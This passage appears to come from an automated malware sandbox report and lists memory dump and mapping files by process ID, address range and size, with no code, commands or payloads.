memory/2520-187-0x00000248C8680000-0x00000248C8682000-memory.dmpFilesize
8KB
-
memory/2520-211-0x00000248C8E40000-0x00000248C8EB2000-memory.dmpFilesize
456KB
-
memory/2696-183-0x000002B2A98D0000-0x000002B2A98D2000-memory.dmpFilesize
8KB
-
memory/2696-404-0x000002B2AA7A0000-0x000002B2AA812000-memory.dmpFilesize
456KB
-
memory/2696-204-0x000002B2AA370000-0x000002B2AA3E2000-memory.dmpFilesize
456KB
-
memory/2696-180-0x000002B2A98D0000-0x000002B2A98D2000-memory.dmpFilesize
8KB
-
memory/2772-220-0x00000272FC330000-0x00000272FC332000-memory.dmpFilesize
8KB
-
memory/2772-221-0x00000272FC330000-0x00000272FC332000-memory.dmpFilesize
8KB
-
memory/2772-497-0x00000272FCF40000-0x00000272FCFB2000-memory.dmpFilesize
456KB
-
memory/2772-250-0x00000272FCB60000-0x00000272FCBD2000-memory.dmpFilesize
456KB
-
memory/2780-223-0x000002D0D7700000-0x000002D0D7702000-memory.dmpFilesize
8KB
-
memory/2780-224-0x000002D0D7700000-0x000002D0D7702000-memory.dmpFilesize
8KB
-
memory/2780-503-0x000002D0D81B0000-0x000002D0D8222000-memory.dmpFilesize
456KB
-
memory/2780-253-0x000002D0D7760000-0x000002D0D77D2000-memory.dmpFilesize
456KB
-
memory/2796-239-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2796-245-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2796-242-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2796-241-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2796-248-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2796-251-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2796-256-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2796-254-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2796-259-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2796-260-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2796-262-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2796-257-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2796-219-0x0000000000000000-mapping.dmp
-
memory/2916-311-0x0000000000000000-mapping.dmp
-
memory/2916-317-0x00000000001E0000-0x00000000001F0000-memory.dmpFilesize
64KB
-
memory/2916-321-0x0000000000520000-0x0000000000532000-memory.dmpFilesize
72KB
-
memory/3076-191-0x0000000000000000-mapping.dmp
-
memory/3156-179-0x000001D47A450000-0x000001D47A452000-memory.dmpFilesize
8KB
-
memory/3156-200-0x000001D47A780000-0x000001D47A7CD000-memory.dmpFilesize
308KB
-
memory/3156-178-0x000001D47A450000-0x000001D47A452000-memory.dmpFilesize
8KB
-
memory/3156-202-0x000001D47A840000-0x000001D47A8B2000-memory.dmpFilesize
456KB
-
memory/3160-192-0x00000000045CB000-0x00000000046CC000-memory.dmpFilesize
1.0MB
-
memory/3160-172-0x0000000000000000-mapping.dmp
-
memory/3160-408-0x0000000076E80000-0x000000007700E000-memory.dmpFilesize
1.6MB
-
memory/3160-474-0x0000000003A30000-0x0000000003A31000-memory.dmpFilesize
4KB
-
memory/3160-195-0x0000000004510000-0x000000000456D000-memory.dmpFilesize
372KB
-
memory/3160-325-0x0000000000000000-mapping.dmp
-
memory/3500-162-0x0000000000000000-mapping.dmp
-
memory/3548-136-0x00000000009B0000-0x00000000009C7000-memory.dmpFilesize
92KB
-
memory/3548-133-0x0000000000000000-mapping.dmp
-
memory/3784-327-0x0000000000000000-mapping.dmp
-
memory/3784-373-0x00000000029B0000-0x00000000029B1000-memory.dmpFilesize
4KB
-
memory/3796-127-0x0000000000000000-mapping.dmp
-
memory/3976-273-0x0000000000000000-mapping.dmp
-
memory/4104-413-0x0000000005050000-0x0000000005051000-memory.dmpFilesize
4KB
-
memory/4124-272-0x0000000000000000-mapping.dmp
-
memory/4128-337-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4128-329-0x0000000000000000-mapping.dmp
-
memory/4160-277-0x0000000000000000-mapping.dmp
-
memory/4184-278-0x0000000000000000-mapping.dmp
-
memory/4184-443-0x00000000057B0000-0x00000000057B1000-memory.dmpFilesize
4KB
-
memory/4184-377-0x0000000076E80000-0x000000007700E000-memory.dmpFilesize
1.6MB
-
memory/4196-297-0x000000000319A000-0x0000000003216000-memory.dmpFilesize
496KB
-
memory/4196-279-0x0000000000000000-mapping.dmp
-
memory/4204-296-0x000000000315A000-0x0000000003163000-memory.dmpFilesize
36KB
-
memory/4204-280-0x0000000000000000-mapping.dmp
-
memory/4216-451-0x0000000005B20000-0x0000000005B21000-memory.dmpFilesize
4KB
-
memory/4216-331-0x0000000000000000-mapping.dmp
-
memory/4216-385-0x0000000076E80000-0x000000007700E000-memory.dmpFilesize
1.6MB
-
memory/4220-281-0x0000000000000000-mapping.dmp
-
memory/4232-282-0x0000000000000000-mapping.dmp
-
memory/4232-298-0x000000000301A000-0x0000000003096000-memory.dmpFilesize
496KB
-
memory/4288-291-0x0000000000000000-mapping.dmp
-
memory/4304-305-0x000000000320A000-0x0000000003226000-memory.dmpFilesize
112KB
-
memory/4304-292-0x0000000000000000-mapping.dmp
-
memory/4316-293-0x0000000000000000-mapping.dmp
-
memory/4420-306-0x00000000005F0000-0x00000000005F1000-memory.dmpFilesize
4KB
-
memory/4420-299-0x0000000000000000-mapping.dmp
-
memory/4432-300-0x0000000000000000-mapping.dmp
-
memory/4444-301-0x0000000000000000-mapping.dmp
-
memory/4456-302-0x0000000000000000-mapping.dmp
-
memory/4456-469-0x00000000060A0000-0x00000000061E8000-memory.dmpFilesize
1.3MB
-
memory/4464-341-0x0000000000000000-mapping.dmp
-
memory/4464-366-0x000000001B980000-0x000000001B982000-memory.dmpFilesize
8KB
-
memory/4468-303-0x0000000000000000-mapping.dmp
-
memory/4480-304-0x0000000000000000-mapping.dmp
-
memory/4560-307-0x0000000000000000-mapping.dmp
-
memory/4672-309-0x0000000000000000-mapping.dmp
-
memory/4708-375-0x00000000053C0000-0x0000000005436000-memory.dmpFilesize
472KB
-
memory/4708-315-0x0000000000000000-mapping.dmp
-
memory/4748-326-0x0000000000000000-mapping.dmp
-
memory/4760-379-0x0000000076E80000-0x000000007700E000-memory.dmpFilesize
1.6MB
-
memory/4760-420-0x0000000005E70000-0x0000000005E71000-memory.dmpFilesize
4KB
-
memory/4760-313-0x0000000000000000-mapping.dmp
-
memory/4764-312-0x0000000000000000-mapping.dmp
-
memory/4824-324-0x0000000000000000-mapping.dmp
-
memory/4832-322-0x0000000000000000-mapping.dmp
-
memory/4868-361-0x0000000004992000-0x0000000004993000-memory.dmpFilesize
4KB
-
memory/4868-378-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/4868-319-0x0000000000000000-mapping.dmp
-
memory/4876-318-0x0000000000000000-mapping.dmp
-
memory/4880-264-0x0000000000000000-mapping.dmp
-
memory/4908-320-0x0000000000000000-mapping.dmp
-
memory/4932-330-0x0000000000000000-mapping.dmp
-
memory/5076-266-0x0000000000000000-mapping.dmp
-
memory/5096-268-0x0000000000000000-mapping.dmp
-
memory/5524-495-0x0000000005490000-0x0000000005A96000-memory.dmpFilesize
6.0MB
-
memory/6036-500-0x0000000000500000-0x0000000000510000-memory.dmpFilesize
64KB
-
memory/6036-502-0x0000000000530000-0x000000000067A000-memory.dmpFilesize
1.3MB